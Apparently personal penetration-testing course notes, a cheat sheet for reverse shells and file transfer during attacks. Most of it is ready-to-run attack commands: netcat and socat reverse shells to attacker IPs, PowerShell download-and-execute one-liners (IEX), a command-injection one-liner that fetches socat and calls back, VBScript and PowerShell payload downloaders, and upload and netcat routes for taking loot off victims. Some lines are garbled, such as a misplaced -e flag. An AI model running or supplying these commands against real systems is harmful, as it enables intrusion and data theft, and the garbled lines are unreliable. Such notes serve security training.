Module 16 (File Transfers)

Generating reverse shell commands

attcker machen

nc -nvlp 4444 -e /bin/bash

victim

nc -nv 192.168.x.x 4444

Upgrading the shell

python -c 'import pty; pty.spawn("/bin/bash")'

#using arrows

#Ctrl + z
stty raw -echo
fg

# In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

*Linux to Windows

#from Linux to Windows
#Local
(new-object system.net.webclient).downloadstring('http://192.168.1.1/powerview.ps1') | IEX
#Remotly
(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') | IEX

*Windows to Linux

scp local_file username@hostname_or_ip:/remote/path
#Example
scp 20240830124156_BloodHound.zip kali@10.50.57.149:/var/www/uploads

Method 1: Python pty module

One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module let’s you spawn a psuedo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade a dumb shell, simply run the following command:

python3 -c 'import pty; pty.spawn("/bin/bash")'                                      

stty raw -echo

Method 2: Using socat

socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY’s over TCP connections.

If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat as well to get the full functions.

The following commands will yield a fully interactive TTY reverse shell:

On Kali (listen):

socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim (launch):

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

With a command injection vuln, it’s possible to download the correct architecture socat binary to a writable directoy, chmod it, then execute a reverse shell in one line:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.10:4444

Windows File transfer

sudo apt update && sudo apt install pure-ftpd

FTP configurations.

#!/bin/bash
if [[ $(/usr/bin/id -u) -ne 0 ]]; then
    echo "Not running as root"
    exit
fi
sudo apt update && sudo apt install pure-ftpd
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd limbo -u ftpuser -d /ftphome
sudo pure-pw mkdb
cd /etc/pure-ftpd/auth/
sudo ln -s ../conf/PureDB 60pdb
sudo mkdir -p /ftphome
sudo chown -R ftpuser:ftpgroup /ftphome/
sudo systemctl restart pure-ftpd

FTPd file commands

echo open 192.168.1.10>> ftp.txt
echo USER hacktor>> ftp.txt
echo hacktor>> ftp.txt
echo bin>> ftp.txt
echo GET nc.exe>> ftp.txt
echo bye>> ftp.txt

#How to run it

ftp -v -n -s:ftp.txt

#Fixing time out problem Code:

echo "40110 40210" | sudo tee /etc/pure-ftpd/conf/PassivePortRange
sudo service pure-ftpd restart

VBScript to download files

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

#How to run it 
[code]

cscript wget.vbs http://192.168.1.10/evil.txt evil.txt

upx -9 nc.exe
sudo exe2hex -x  nc.exe  -p nc.cmd

Power shell commands to download files

echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://192.168.1.10/shell" >>wget.ps1 
echo $file = "shell" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
[code]
#How to run it 
[code]
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
[code]

#Powersehll In one line 
[code]
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.10/upload.php', 'pass.txt')
[code]

#On Fly command  --> Run powershell script without downloading it on the hard disk
[code]
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.10/hello.ps1')
[code]


#Uploading files 
#Preparing kali upload direcotry 
sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads

Save this php code into /var/www/html/

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile) ?>

This is how to use it

powershell (New-Object System.Net.WebClient).UploadFile('http://10.9.0.213/upload.php', 'iexplore.DMP')

Different methods to setup the server for file transfer

To perform the file transfer we need to setup a server, besides using updog.

updog -p 80

wget

We can use the wget command to transfer the file. wget is a powerful command to download files from the web. It should be noted that while doing file transfer using wget in windows, we need to mention the -o (-OutFile) flag in order to save the file. If we do not mention the flag then it will only return it as an object i.e., WebResponseObject. The command for wget in windows is:

powershell wget http://192.168.1.8/ignite.txt -o ignite.txt -o ignite.txt

curl

Curl is a powerful command-line tool, which can be used to transfer files using various networking protocols. Following will be the command to transfer the file:

curl http://192.168.31.141/ignite.txt -o ignite.txt

To setup a server using PHP, we can use the following command:

php -S 0.0.0.0:8081

To setup a server using python2, we can use the following command:

python2 -m SimpleHTTPServer 80

To setup a server using python3, we can use the following command:

python3 -m http.server 8000

File transfer using Netcat

Netcat, commonly known as nc, is a multifunctional networking tool designed for reading from and writing to network connections over TCP or UDP. Netcat can facilitate file transfers by establishing a simple client-server setup.

To transfer file in the kali machine from an Ubuntu machine we can use the following command inside kali:

nc -lvp 5555 > file.txt

Now wSimilarly, we can also receive files from a windows machine inside our kali linux. However, it should be noted that we the target windows machine should have the nc.exe binary to make this method work.

Following is the command we need to run on the windows machine:

nc.exe 192.168.31.141 5555 < data.txt

To receive the file in the kali machine, we will run the following command:

nc -lvp 5555 > data.txt
cat data.txt

PSCP (Windows to linux)

sudo apt install putty-tools
sudo pscp Administrator@<IP_WIN>:/Users/Administrator/Downloads/20240806021013_loot.zip ~/PATH/To/Savefile-in_Lnux/